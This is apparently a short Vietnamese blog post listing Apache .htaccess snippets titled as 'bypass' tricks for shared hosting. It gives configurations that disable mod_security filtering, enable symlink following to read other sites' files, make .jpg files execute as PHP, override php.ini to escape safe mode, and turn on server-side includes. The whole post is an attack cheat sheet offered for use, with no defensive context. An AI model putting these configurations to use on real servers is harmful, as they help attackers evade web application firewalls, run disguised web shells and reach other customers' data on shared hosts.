1. Bypass mod security

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

2. Bypass symlink

Options All
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
AddType text/html php

hoặc

OPTIONS  Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS  Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All

3. Chạy jpg như php

AddHandler application/x-httpd-php .jpg .php

4. Bypass safe mode

Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC /home/user/public_html/php.ini
suPHP_ConfigPath /home/user/public_html/php.ini

5. Bypass 400

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

6. Chạy ssi

AddType text/html .shtml
AddOutputFilter INCLUDES .shtml        

Đăng nhận xét Blogger

 
Top